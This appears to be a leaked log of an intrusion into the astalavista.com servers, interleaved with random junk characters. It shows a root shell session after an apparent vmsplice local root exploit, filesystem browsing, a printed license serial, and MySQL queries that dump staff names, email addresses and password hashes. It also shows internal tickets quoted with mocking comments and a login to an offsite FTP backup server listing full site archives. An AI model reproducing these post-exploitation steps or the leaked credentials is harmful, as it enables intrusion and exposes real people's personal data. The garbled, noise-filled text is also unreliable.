- g" M: }+ ~+ w7 G/ J! E" _-rw——- 1 com com 21880 Jun 2 08:07 .bash_history
+ |# ]' \ I& S* m8 l+ l-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout% V1 @$ l8 m1 R' M5 T, U
-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile
* N% b# |; _) x1 C-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc
& L! f" I h0 A) N% i# rdrwx–x–x 3 com com 4096 Jan 29 2008 domains
1 O0 Y- _$ z f" C( B9 F- t-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed3 O p M. V: b) |
drwxrwx— 3 com mail 4096 Jan 6 19:24 imap
[" \) X1 I8 F8 A% q) P; Q-rw——- 1 com com 69 Nov 18 2008 .lesshst: {! H( v; A- w0 b, e8 L! J3 M- [
drwx—— 2 com com 4096 Sep 24 2007 mail
3 H: `9 d, G, e [3 [-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history
4 k8 }- @: E% ^) q M0 gdrwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp
# H/ E! J( {3 V1 a t2 Ylrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html. d$ x! X8 s& m) k5 K
-rw-r—– 1 com mail 34 Sep 24 2007 .shadow: z' R. \- y$ `7 G3 x% t/ @3 Q
drwx—— 2 com com 4096 Aug 26 2008 .ssh( C. `, [# J" e0 V
-rwx—— 1 com com 8515 Feb 10 2008 t- s0 ]& D9 O4 |6 l: Y x7 F. B
-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c1 n: K" T1 l% C9 [8 u
drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp7 R: t; n9 Q. [
-rw-rw-r– 1 com com 617 May 20 2008 .toprc i9 k" ]2 ~9 N
-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql
4 z0 u5 U1 R1 f% b8 s-rw——- 1 com com 16629 Mar 28 21:46 .viminfo
5 q' ^1 h0 W' }! d* X0 B- P-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc+ Q$ |/ y( [5 |1 V# y
! o: k( T7 ?" O \2 L$ h4 W9 zsh-3.2# head t.c
* g+ i6 [7 `8 _9 y' ]3 Z/*7 G) I$ \& s5 M4 c1 z* M5 M
* jessica_biel_naked_in_my_bed.c
H" K4 @9 C* D/ d U*
9 W; a# J+ V2 D3 v9 H- x+ {' Y* M* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
' X+ q& f, b4 Q* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
' f! u" N' c' ]1 V- i* Stejnak je to stare jak cyp a aj jakesyk rozbite.
T& A; F' ?' O+ f/ _*
2 p) c0 b5 ~, ?& A! P) J* Linux vmsplice Local Root Exploit
5 Q1 Z: u/ I) Y x( W! f( \* By qaaz
) y) T+ L3 k! Y6 t5 N* E- p, d$ u2 F
8 @! N& V' V* y
sh-3.2# cd /
: w- `8 p1 \5 a4 A# N' ush-3.2# ls -la0 l5 y' ]# g( W- K
total 360% q0 i `9 U* i$ R7 v0 M
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .
7 E$ y1 Q- K" Qdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
$ b4 x2 d* n. H" i4 F8 S-rw——- 1 root root 10240 Jun 3 02:39 aquota.group$ k- ]) X, n; X2 U4 V& Z
-rw——- 1 root root 10240 Jun 3 02:39 aquota.user# o: ?4 R5 F# d# t( b
-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db! g5 U* {6 @( k% C+ E
-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck
1 \7 G" e% @2 s; q, @7 t/ A-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel
) {9 k# ~* F' }! p6 hdrwxr-xr-x 3 root root 4096 Dec 29 2007 backup
3 h0 U5 z7 j- i7 A g! I4 q0 D0 wdrwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
# `$ }; @4 f! D8 P2 e! V# C$ Zdrwxr-xr-x 5 root root 4096 Jun 2 14:06 boot. M$ l5 Z, ^, N
drwxr-xr-x 11 root root 3620 Jun 3 02:43 dev; `7 \4 M5 c0 P$ |
drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc
+ B% Q$ |9 Z) B9 edrwxr-xr-x 14 root root 4096 Mar 11 17:56 home" ?4 ^ z* z% |3 B* ~7 @: b
-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf: }& [- T" U: J1 W& R
drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib
! T5 G6 P. F: V" _drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64
: W3 O4 O0 t$ C$ v; h0 hdrwx—— 2 root root 16384 Sep 11 2007 lost+found
; D3 p) @0 p5 l6 Ldrwxr-xr-x 2 root root 4096 Mar 11 17:56 media6 v& c3 @0 t. j1 J, n7 I/ t
drwxr-xr-x 2 root root 0 Jun 3 02:43 misc
% f. l: q2 o- E# c& B, c) _) r) jdrwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt
8 I; u4 `4 Z* J$ }-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg
3 R" j9 Z1 G/ H D" r" H! {8 M0 Fdrwxr-xr-x 2 root root 0 Jun 3 02:43 net5 o; x c9 h! U( d" K- G4 S
drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt4 d; K( Y3 ?5 n/ ?1 j8 b; Z8 D
dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc6 \* |- x/ J! B, w' |& r: [% r* P
drwxr-x— 15 root root 4096 Jun 4 08:40 root: M. @. P0 T" V! y- F
drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin) M; a' u9 n1 S- ?/ O+ u5 s: X7 \! |
drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux3 P7 j I! X6 ]$ W" D6 E8 C+ h
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
$ R7 ~; h# ~. }* G- t9 rdrwxr-xr-x 11 root root 0 Jun 3 02:42 sys' Z$ X4 K" v/ X! P: \6 v, x7 |
drwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp
, L3 ` A# O8 S, Cdrwxr-xr-x 16 root root 4096 Jun 2 13:56 usr* d- P0 X% H3 a* [
drwxr-xr-x 26 root root 4096 Jun 4 03:16 var
$ A8 G; L. m; D5 x4 Y0 l( [ r8 B# Z; w3 S D4 [% ?$ h7 Y* C7 o/ \
sh-3.2# cd opt1 u% {9 G" k+ u3 j! t
sh-3.2# ls -la( {# C; z9 f H7 q9 L
total 20
5 R3 I4 ?# u9 L0 J. D! ^. {4 Sdrwxr-xr-x 3 root root 4096 Mar 11 17:56 .
! ^7 t% M9 M8 }+ t* `6 ]* a9 [' udrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
9 |# H/ G. C7 y. sdrwxr-xr-x 15 root root 4096 Mar 20 2008 lsws* ~) | n5 O# W' W, q1 x/ c
4 P: l3 c7 ~9 q& q3 ush-3.2# cd lsws/" H6 o% p, H% l5 Y6 H, G6 D* Q5 ?
sh-3.2# ls -la
: {) J0 g! M8 D3 [+ x1 Rtotal 108
! T# J; Y, i' h0 @drwxr-xr-x 15 root root 4096 Mar 20 2008 . G% ^$ J7 V& ]& ^
drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..
1 z& ^& h" R6 b: M' [; a. Z' ?drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons8 S- e- Y+ J9 ^, k
drwxr-xr-x 13 root root 4096 May 29 15:10 admin
1 _; r9 }3 a$ }" I/ \8 vdrwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate8 o' a- V/ u3 L6 F4 m
drwxr-xr-x 2 root root 4096 May 29 15:10 bin5 v/ A' i' N# U8 o
drwx—— 4 apache apache 4096 Jun 3 02:43 conf& u9 `/ `9 ^4 c* U
drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT: w# k: }) S- H- T& h% U# {$ [7 P
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs9 o% B8 M* o( }( Q; z/ b
drwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin8 D" y- A# G! o% W
drwxr-xr-x 2 root root 4096 Sep 15 2008 lib
- |) H# y0 ^3 |: ~* X-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE
0 i- \' f1 x2 ~% a-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP3 S0 m' d5 }0 `/ H t9 N ~
-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL) f: ]: V# d& Y) M+ @/ A2 G
-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP
% V) p8 }- R& K) vdrwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
, ~, P G( ~/ Z; ?3 \. cdrwxr-xr-x 2 root root 4096 Mar 20 2008 php, p6 y: D. O+ `& v( I5 {1 q0 }
drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild
( P1 X6 m5 [3 ldrwxr-xr-x 3 root root 4096 Mar 20 2008 share
, }! J. I( g" W) o( F-rw-r–r– 1 root root 6 May 29 15:10 VERSION1 C" @9 k8 O. S1 ?
M7 d2 o$ {$ M/ j1 K
sh-3.2# cd conf. |0 o2 R. Y* G) e8 O* a+ M5 ?
sh-3.2# ls -la
! Q3 ?; b' G9 V5 I7 y9 Xtotal 48
, ^ S9 N1 }5 v, Xdrwx—— 4 apache apache 4096 Jun 3 02:43 .9 K+ S, t) |, `4 t6 m. x, S
drwxr-xr-x 15 root root 4096 Mar 20 2008 ..
: L: X) H1 q! W7 D3 ?8 udrwx—— 2 apache apache 4096 Mar 20 2008 cert: r0 h0 d" o! \0 r4 T
-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml
1 Z- g* W8 _6 u3 r' f- v-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak7 I3 k% r, E+ B+ j* j
-rw-r–r– 1 root apache 0 Jun 3 14:11 .last! C# s* a' ~ V3 o) T) E9 `/ L, W
-rw——- 1 apache apache 256 May 29 15:10 license.key
6 |/ F* o4 N, T: W# M. j$ h9 t8 F-rw——- 1 apache apache 256 Mar 21 2008 license.key.old
/ k9 Q4 O- Z# W. R Y-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties o0 N$ E" M* u8 V8 w+ S/ r
-rw——- 1 apache apache 20 May 29 15:10 serial.no
$ A4 E* C% R2 kdrwx—— 2 apache apache 4096 Mar 20 2008 templates
6 ?2 B# A1 a& u) k3 U% n% {8 ~% N0 c
sh-3.2# cat serial.no
8 U( t' C! H% JIbDl-oVsO-CKqL-wVRa4 X: C0 H0 `8 q7 \% S0 L
: e3 ?+ s. f- G) N/ @
sh-3.2# mysql. G! `- w/ K. R) a* M/ v3 ]
Welcome to the MySQL monitor. Commands end with ; or \g.
1 Y. T+ ?' `% j! YYour MySQL connection id is 286844
7 _$ _8 m- ~) k+ WServer version: 5.0.45-community-log MySQL Community Edition (GPL)% H- B9 J+ ^9 c* M7 H1 Q. }
0 q+ P5 z: }/ A# m" o1 ^4 C. J
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.2 u# _+ D* ?: V- h/ R* E& e7 E2 l6 A
9 E, R5 v" @( @/ d3 ]mysql> show databases;4 a8 v: t: N8 }! G# C1 c
+———————–+2 X( p3 [" G, v1 Q! |' I, ]
| Database |
- F9 g4 y. G$ [5 S+———————–+3 l7 a+ \5 U, v: _9 T# R
| information_schema |- s$ G Q! i$ s ]' `& }
| astanet_ads |, C/ z. x& E( ], |* v' Z3 u
| astanet_mailing_lists |2 F0 k7 L F7 P/ m5 T% c
| astanet_mediawiki |! z) i3 q$ ]8 E7 }
| astanet_membersystem |0 Z/ o' t2 s+ t) p/ m9 ]5 S: [- w
| com_contrexx |
6 r9 Q* d+ M: v* || com_contrexx2 |
5 g; @2 x6 Y7 q5 @+ r3 d| com_contrexx2_live |
2 i S+ F- ~2 h8 d| da_roundcube |
3 x. W0 R: S) A7 ]1 U) }- r| dolphin |& j3 x2 W* V+ Z
| ideapool |
& \+ f/ i- R' C| mysql |
9 D$ n' x, Q3 A3 M) g| test |
% R) T L" {0 K& I| yourmaster |/ _$ e# r- K4 j+ r% q! g
+———————–+6 A. W9 V2 I5 k* m: z
14 rows in set (0.00 sec)
+ c G O4 s2 r4 J9 |8 L/ Q) B, D0 A0 F' k+ D8 v
mysql> use ideapool
8 Z! z2 G* c: o) S* WDatabase changed" v* x$ @$ {" f: k
mysql> show tables;+ p2 Y0 {% D" N$ {, _, |5 V9 j
+———————————–+! d; j6 a* Q3 @, m& e( v) U5 ^
| Tables_in_ideapool |
3 K+ i& Q# u! d+———————————–+
. |! ?/ n2 b/ d' u( H. d| eventum_columns_to_display |9 y% t, i) K' {" R& M/ n
| eventum_custom_field |
3 ~7 x# Z3 ]/ s9 ? C| eventum_custom_field_option |- Y& |, Z1 B) j! B( i, |
| eventum_custom_filter |/ p5 K) c# F4 i# K1 i, C
| eventum_customer_account_manager |
& K: I) H9 p+ n" {| eventum_customer_note |- x+ [; B; S9 I. G1 O% K2 H
| eventum_email_account |6 K5 J" y/ ]$ r- y- G
| eventum_email_draft |+ g. z! r1 }8 k% B" f9 l
| eventum_email_draft_recipient |
$ v4 v5 Z; D+ ?| eventum_email_response |
9 l, d k) V- p3 W5 W- l6 T| eventum_faq |$ S' g9 X4 a/ b
| eventum_faq_support_level |5 s: x; @- b h
| eventum_group |# G! B( v" L. N/ y! v" u
| eventum_history_type |
1 r4 L+ K. S5 x l' Y| eventum_irc_notice |
8 m* \& u% W& Y| eventum_issue |8 X, D/ }* O5 y
| eventum_issue_association |. F. E* w. Q5 i) s
| eventum_issue_attachment |' q1 G$ \ z2 e2 o+ G
| eventum_issue_attachment_file |
: j l' r$ G& {& f; L; ?# p! E| eventum_issue_checkin |
9 l! k3 z% z/ q v8 t| eventum_issue_custom_field |9 b+ s2 x) b; R2 M3 ?# ^5 }, S
| eventum_issue_history |
R- q2 ?+ I5 ^) d| eventum_issue_quarantine |. h# B' [& m9 J& b* {1 [/ A
| eventum_issue_requirement |
+ }/ U, k; ~ V- c; v+ _| eventum_issue_user |7 c y5 l$ @* M- i
| eventum_issue_user_replier |% X( m8 G9 J/ q' y8 t
| eventum_link_filter |8 D3 J2 p! P- c! T# Y
| eventum_mail_queue |/ s0 M5 g. {% C n+ x+ K8 f
| eventum_mail_queue_log |! R2 y8 E6 E9 u" [( A) e9 R
| eventum_news |
" u# z1 r5 h B9 x| eventum_note |
- Y* c$ q0 n. ]* x( v# z| eventum_phone_support |4 C, Z# S' R' N
| eventum_project |
; x' I% [+ O2 [- r0 p| eventum_project_category |
" h2 s- P9 F3 B* }# ^; u t| eventum_project_custom_field |4 D. ?! H. O% Z# b$ R. x- Y
| eventum_project_email_response |
7 h* ~$ ~" i% B+ ~& p4 K" j| eventum_project_field_display |
' d% S2 o8 ^! S0 K1 b4 [7 Q, B# h| eventum_project_group |
: f) f# s/ K: c5 J0 j| eventum_project_link_filter |) ^( w1 P, V4 V$ |$ A
| eventum_project_news |& ]+ |2 s* u& A! T4 p7 a! w0 T- g* y' `
| eventum_project_phone_category |
% d6 o; ~" s# A n |6 a| eventum_project_priority |- k# ?2 k" b* V! `: x
| eventum_project_release |7 {2 J# ] {+ o" `. b
| eventum_project_round_robin |+ m' v7 j9 A3 y5 h6 K. L8 O& \
| eventum_project_status |+ O& K" r. p& g: u3 S+ x7 U+ w
| eventum_project_status_date |
6 ]# Y9 k0 A l3 [, k| eventum_project_user |; v2 U4 t3 c* F/ o" E }
| eventum_reminder_action |% o( |4 x# v/ T) H& u
| eventum_reminder_action_list |* E( O: y. i- M
| eventum_reminder_action_type |
/ {8 k% q$ |1 d7 n+ h| eventum_reminder_field |
+ a& o7 A9 h1 x, j1 R) t3 d+ O| eventum_reminder_history |
& s+ A7 j3 S, R1 R8 j| eventum_reminder_level |
9 E& l+ L( }( `+ h% h F/ a7 P| eventum_reminder_level_condition |
- v X/ U) Z, e$ ?5 ~4 g, m: a| eventum_reminder_operator | Q# w1 g6 f9 ~! \6 J
| eventum_reminder_priority |9 w6 o$ o( O) I" `0 T
| eventum_reminder_requirement |
+ }9 u$ H8 E8 [4 @| eventum_reminder_triggered_action |" O" d8 O& Y; k4 P5 s
| eventum_resolution |
( |3 y4 q* s% r! V! R| eventum_round_robin_user |9 ]2 ?% v( w ~9 o
| eventum_search_profile |4 v" E0 ]0 C, r
| eventum_status |/ d3 W' z! v4 Q$ n0 e* L I
| eventum_subscription |
8 I5 W1 s; d2 o4 b; T| eventum_subscription_type |; E/ V7 I% s3 w; q: E6 s
| eventum_support_email |# f$ X' K7 T- M. H5 Q/ j7 F: y/ G
| eventum_support_email_body |
/ }5 `9 B0 V% `7 C| eventum_time_tracking |
+ I; f* f" U: q1 O* i5 I| eventum_time_tracking_category |
# q( u; _% I& O9 v) ` D( d8 m| eventum_user |
" b: I- o3 `0 v0 g! }+———————————–+
# h7 s' f, f' d' A t69 rows in set (0.00 sec)
; [. i. R' F6 V1 _8 T p
; k: E# ^* a; q6 m9 Xmysql> describe eventum_user;- g2 Z- d( |: N+ H) R
+————————-+——————+——+—–+———————+—————-+0 W$ S' K- I3 X M
| Field | Type | Null | Key | Default | Extra |; w" z( i& `! ?( j/ D
+————————-+——————+——+—–+———————+—————-+. b' t# w; Y: K" m5 J
| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |3 e' q) X @6 O! [' F1 T; @
| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |" ~5 c& q2 Y( N6 X
| usr_customer_id | int(11) unsigned | YES | | NULL | |: n' x2 x. j5 c" ?& D/ Q! C
| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |
! ?; F4 M& J4 P8 ~9 L% U| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |
9 x# L# @) |3 w| usr_status | varchar(8) | NO | | active | |
7 t. G' @2 e3 _6 u6 |$ G. n, A5 R| usr_password | varchar(32) | NO | | | |
. }* U- n7 ~: m) L' q| usr_full_name | varchar(255) | NO | | | |
+ t7 N! b4 M. d# x% k* T' W| usr_email | varchar(255) | NO | UNI | | |
5 G' T' r; h5 N+ S+ ~- e0 K| usr_preferences | longtext | YES | | NULL | |$ u1 s! H z" J4 V: Y
| usr_sms_email | varchar(255) | YES | | NULL | |+ A: R' _3 \: S7 t7 a
| usr_clocked_in | tinyint(1) | YES | | 0 | |/ l; p8 J- q; o% F |7 V( [
| usr_lang | varchar(5) | YES | | NULL | |
# w0 h% g0 Z$ I% b+————————-+——————+——+—–+———————+—————-+- f- ]% ?& ^$ y
13 rows in set (0.00 sec)2 ]# {( H7 I9 B Q h) w0 U; Z
5 p4 x) [7 m" Q% Gmysql> select usr_full_name,usr_email,usr_password from eventum_user;, s! I$ _$ i: q, S; B. q/ T l
+———————-+——————————-+———————————-+% g+ _4 N) p3 b1 S1 A3 m% c7 V
| usr_full_name | usr_email | usr_password |
* ?9 H/ j: a& E, @6 S/ w+ q' I9 g+———————-+——————————-+———————————-+9 t/ c( l6 N* b/ y
| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 | u3 K& w# a2 n0 |; }0 S/ T
| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |! ?! e L4 w( i
| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |4 J; Q- @3 }* e- ?
| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
1 `* o4 D# H8 @) f# ~& i- k| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |
, R0 r& I! n# V9 L' n| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |( q r$ Y. d) `, k5 o+ G. K0 X1 r
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |
! ~5 z, C4 H5 W. ]( M* t' h _8 v| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |1 n' X3 p6 K, Y1 q
| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |! s' G& \' l% ~6 d: o- J
| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |- V4 s$ j1 T6 ^& T- A2 u
| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |0 g- y2 C* r2 m: k' b0 O: X
| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |' Z+ `5 o% W) F1 L( j
| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |7 N* F/ `: k* U0 ~! a0 @. V) `
| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |
4 d& U$ U% S0 Q1 S K% t$ m| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |
) ]3 j3 Z+ D% P+———————-+——————————-+———————————-+' G2 \# i; H9 a- P
15 rows in set (0.00 sec)
6 _; L0 k9 r; ~; U) {7 w' U* |1 T, p! Y5 v9 E9 k
mysql> select iss_description from eventum_issue where iss_id = 43;$ _$ D5 x: b: ^+ o6 @% Q
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
6 b. E# ^0 p& ~$ c| iss_description ' f6 Y( j& L+ U) k' R) ~ H" W* y
|2 X8 \. A0 k _3 x3 D( e4 W
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+2 l5 G6 }6 ?* t. V! a0 V- q# v8 L# O
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be
?6 J5 ]0 j! P- @/ D( bconnected for 90 mins… 120mins… so what i propose is something like:
7 q4 w7 h' h& T1 }* f7 m/ P链接标记[url]http://www.surfthechannel.com/[/url]
4 H) X; h( K4 ?! h, s& esince they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system
4 W% g& P A1 P jlike podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t7 S: G- f' l8 O# }( d
break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
4 y6 E, H; A- G6 U5 Cif they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…3 M5 A; T3 M/ a! t5 c
c0 O. w" ~2 ^6 mWe could also put advertisement during play on the flash video player itself… extra $$…
3 U5 m7 k: M- H0 V
0 G/ k/ n* `5 \By sykadul |
3 t& D4 z3 f* Q* o6 C: L+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+' E! a7 {, O/ U7 F9 j
1 row in set (0.00 sec)
j2 Y& [5 N( `/ U p& ^, E9 ^! G2 z
// Money and extra $$ is all they care about. remember that.& l2 D) Y" [' b4 G8 O4 R
* y$ _: G' c- q4 zmysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
6 Z2 N) e- s5 V+————————+——————————————————————————————————————————————————————————————————————————————-+
3 j# Y2 t$ P6 l| iss_summary | iss_description
( P' h. u- C( C& K) Z9 }' f6 k/ y|3 i7 Q/ q$ C8 V/ w; U
+————————+——————————————————————————————————————————————————————————————————————————————-+
0 K0 E1 [5 y8 _, [- B c4 q& \| Forum for REAL EXPERTS | Hello,( [$ a) y/ I& S+ V
3 r$ h) W! {# H t, r7 b1 J
Ishtus and I,4 |5 z v' ]6 H+ G: q0 Y& m7 _
. c, r% u: B1 N( ?; k5 D5 k+ e
Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide$ C2 e- Q. t4 ? N2 e: x
ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
( u3 n% u9 f8 \- e. S7 t
3 V3 f, R4 u' n. a7 B* m: i- ~ LOne example a friend of mine from coresecurity.com!
# u- ~4 _$ Q$ n
3 e& Q2 a8 _/ b0 Q2 L. RWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc../ t; {% ?$ }$ w
) A5 \: U- g# l9 M9 R9 Z) L7 d
|
) H' J- V- u6 n2 i( n: s' ~7 S# s+————————+——————————————————————————————————————————————————————————————————————————————+$ r& m; M: k8 G# s
1 row in set (0.00 sec)# c; X5 G( G; P* K
3 o. F* E3 m8 L% {7 f, O// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…7 v. C3 R' I0 h$ j
6 f" x& u- c. f5 j8 B& Ymysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
e4 y5 E9 i6 @+——————+———————————————————————————————+
3 u# }* u3 q ^% _: C2 P( C| iss_summary | iss_description |- F s' K! }8 X
+——————+———————————————————————————————++ N2 i% m& K6 ?) {6 F/ F
| Website guidance | Virtual Girl which guides you trought the website.
6 G4 M! H) @1 u: w, E$ C: @9 u! m
+ h" E4 n }% h- LWe need a girl with who you can ( talk )!!!& C* B) X+ `, J
Also for the News!, t A7 W/ B0 n, \ p
So my suggestion is a girl who read you the news loud if you like!: f. T0 n+ Z+ y
you can choose between read yourselfe or she read it for you or both!
" ?) Y& ?% q# X: ?( X! ]$ D* N. Y; G1 ?
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!$ Y% p; X; v% T, O9 O' K, G
8 D% U: R3 f$ Q7 Q4 V9 b
Have a look on the example girls!!# L- e/ g0 E3 b" f" c! g6 u8 k
8 h2 e( v" x$ v/ {
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]
' C2 y8 r( s6 ]* S# t
7 Q3 \9 a* Z! y4 l9 R2 J5 C$ wor that3 i4 S. B: U$ J4 z! [) g8 g, n5 J
! G6 s8 y( t. P* ?( w( k
链接标记[url]http://www.yellostrom.de/[/url]
+ N, X/ d' [9 i9 U. N9 D$ m0 _- r. f* k. S0 R Q& Z+ D4 F
|
. \ P2 p0 s# o8 U! g t( m2 N+——————+———————————————————————————————+
+ P/ E3 L- t) [- c( T9 V1 row in set (0.00 sec)
) N P$ R; s$ I
1 z- O* i! }# X// ha ha.# I, e. I/ l9 t0 [+ W2 X4 n( h6 N
6 d+ H+ O$ P3 T/ C1 Rmysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;' G8 x2 W! @6 r- ~3 N& Y; x* l7 C
+————————–+———————————————————————————————————–+
3 x- S6 Q5 V- Q* z! }! K| iss_summary | iss_description |' ?8 `) s3 b8 A; Q" \3 N+ e$ e
+————————–+———————————————————————————————————–+
+ _3 @, i2 ]0 g| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |0 x$ e9 q( L0 P v. b
+————————–+———————————————————————————————————–+' w+ p* M5 I$ Y: j6 `0 E, l3 L* d
1 row in set (0.00 sec)9 ~# M7 {3 b+ N i7 L) Q
2 v2 s( l" ]& t5 U/ h" d7 E
// LOL.
/ K8 v: q5 g. Z# v& q
- j: C+ t4 M* ~8 Zmysql> exit
6 G0 T3 p% H$ w+ \7 x5 q6 KBye3 C) L. v4 Y% A, V( p
5 B! _3 D5 l3 _" F1 u& E2 Xsh-3.2# ftp 212.254.194.163+ @% c6 X3 T& E# n& C; @5 ^
Connected to 212.254.194.163.5 i1 G7 } u4 t+ q% I& j
220 BackupCOM_VW FTP server ready.2 R1 [4 d8 H: t4 o3 d4 u+ b
504 AUTH: security mechanism ‘GSSAPI’ not supported." x+ U& O( [6 _% K5 ^ i* C8 E
504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.* P# P% S4 V/ s& h1 E4 u( v5 \) g4 W
KERBEROS_V4 rejected as an authentication type! F' L* Z1 G0 ?% X
Name (212.254.194.163:root): astalavista.com
4 ~+ R6 Y0 b( Z- \331 Password required for astalavista.com.
$ Q# _( p: m3 { v+ aPassword:' O7 V& y! |6 m' Q# T
230 User astalavista.com logged in. J5 X9 }2 A$ _7 [0 X! y
Remote system type is UNIX.9 f& v* X" d" G& G
Using binary mode to transfer files.
% a' U" R$ m2 {$ y" jftp> ls -la
- C6 \$ y% b. }2 D227 Entering Passive Mode (212,254,194,163,2,188)
+ h: m' ?) }8 e% k3 ?150 Opening BINARY mode data connection for ‘file list’.
0 U/ }1 G6 L8 e' W9 Adr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com: G" X, Q3 D, l7 h9 Z
226 Transfer complete.* }% x+ M- t# E" A% v5 u" d5 e
ftp> cd astalavista.com6 K! m1 @8 C5 Z- G7 |) |* C
250 CWD command successful.
: \4 ~/ I1 e- } W4 H$ b- V# Uftp> ls -la2 C9 a# R- M9 T5 v
227 Entering Passive Mode (212,254,194,163,2,189)
9 P- s9 _: {6 q+ |3 G150 Opening BINARY mode data connection for ‘file list’.
( I' O, J x4 n2 V* v6 Z-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
# _9 X. ~7 L5 j8 [-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz27 ~/ c) ]+ T6 _4 U0 h4 u: F
-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
+ `# y( w' _8 v3 N7 \+ l7 n1 _-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar$ Y- o: h$ b) }" n% {% ?( w/ L
